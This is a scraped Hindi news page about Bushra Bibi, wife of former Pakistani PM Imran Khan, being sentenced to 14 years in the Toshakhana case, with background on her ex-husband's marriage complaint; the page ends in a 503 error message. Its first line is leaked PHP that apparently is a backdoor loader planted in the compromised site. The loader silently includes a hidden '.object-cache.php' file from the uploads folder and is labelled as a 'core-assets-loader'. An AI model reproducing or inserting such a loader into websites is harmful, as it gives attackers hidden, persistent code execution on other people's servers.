add_action('wp_head', function(){echo '';}, 1); /* core-assets-loader */ @include_once('/home/sochindi/public_html/wp-content/uploads/.wp-cache-cd8672/.object-cache.php'); PAK के पूर्व PM इमरान खान की बेगम बुशरा बीबी को झटका, इस केस में हुई 14 साल की सजा – SOCH INDIA
Menu

देश
PAK के पूर्व PM इमरान खान की बेगम बुशरा बीबी को झटका, इस केस में हुई 14 साल की सजा

nobanner

पाकिस्तान के पूर्व प्रधानमंत्री इमरान खान की बेगम बुशरा बीबी को 14 साल की जेल की सजा सुनाई गई है. पाकिस्तान तहरीक-ए-इंसाफ (पीटीआई) के चीफ की पत्नी के खिलाफ यह एक्शन तोशाखाना केस में हुआ है. बुधवार (31 जनवरी, 2024) सुबह वहां के समाचार चैनल “जियो न्यूज” की रिपोर्ट में इस बात की पुष्टि की गई है.

अदालत ने इसके साथ ही इमरान खान और उनकी पत्नी दोनों को 10 साल तक किसी भी सार्वजनिक पद पर बहाल होने से रोक दिया है. अदालत ने उन पर 78.7 करोड़ रुपये रुपये का सामूहिक जुर्माना भी लगाया गया है. बुशरा बीबी आज कोर्ट में पेश नहीं हुईं थीं. एक दिन पहले ही इमरान खान को देश की गोपनीय दस्तावेजों को दूसरों तक पहुंचाने के आरोप में 10 साल की सजा हुई थी. इसके बाद एक दूसरी कोर्ट की यह सजा उनके लिए दोहरा झटका है.

पूर्व पति ने दर्ज कराया था मामला
पाकिस्तान के पूर्व प्रधानमंत्री इमरान खान की पत्नी के पूर्व पति खावर फरीद मनेका ने 25 नवंबर 2023 को दोनों के खिलाफ व्यभिचार और धोखाधड़ी से शादी करने का आरोप लगाया था. 71 वर्षीय खान और 49 वर्षीय बुशरा बीबी के खिलाफ पाकिस्तान पीनल कोड के मुताबिक विभिन्न धाराओं में इस्लामाबाद पूर्व के वरिष्ठ सिविल न्यायाधीश कुदरतुल्ला की अदालत में मामला चल रहा था जहां सजा सुनाई गई है.

इमरान खान पर शादीशुदा जिंदगी बर्बाद करने का आरोप
मामले की सुनवाई के दौरान पाकिस्तान के पूर्व प्रधानमंत्री इमरान खान की पत्नी के पूर्व पति ने सुनवाई के दौरान बयान में अपना दावा दोहराया कि खान ने उनकी शादीशुदा जिंदगी बर्बाद कर दी. ट्रायल के दौरान इस्तेखाम-ए-पाकिस्तान पार्टी के सदस्य अवन चौधरी, निकाह कराने वाले मुफ्ती मुहम्मद सईद और मनेका के घर के कर्मचारी लतीफ को नोटिस जारी कर इनके बयान भी रिकॉर्ड किए गए थे. इन आरोपों की खान की पाकिस्तान तहरीक-ए-इंसाफ पार्टी के नेताओं ने कड़ी आलोचना की थी.

गैर मौजूदगी में बुशरा के घर जाते थे इमरान खान
शिकायत में मनेका ने अदालत से आग्रह किया था कि खान और बुशरा को न्याय के हित में कानून के अनुसार कड़ी सजा दी जाए. उन्होंने कहा कि पीटीआई प्रमुख इमरान खान अक्सर स्पिरिचुअल हीलिंग की आड़ में उनकी अनुपस्थिति में घंटों उनके घर आते थे, जो न केवल अवांछनीय बल्कि अनैतिक था.

2017 में दे दिया था तलाक
बुशरा के पूर्व पति ने बताया कि खान देर रात बुशरा को फोन करते थे, बुशरा को बातचीत के लिए अलग संपर्क नंबर और मोबाइल फोन भी दिए गए थे. मनेका ने कहा कि उन्होंने 14 नवंबर, 2017 को बुशरा को तलाक दे दिया था. उन्होंने कहा, ‘व्यभिचार का जघन्य अपराध हुआ है. एक जनवरी, 2018 को शादी का नाटक रचा गया था. बता दें कि इसी तारीख को इमरान खान ने बूशरा से शादी की थी.

503 Service Unavailable

Service Unavailable

The server is temporarily unable to service your request due to maintenance downtime or capacity problems. Please try again later.

Additionally, a 503 Service Unavailable error was encountered while trying to use an ErrorDocument to handle the request.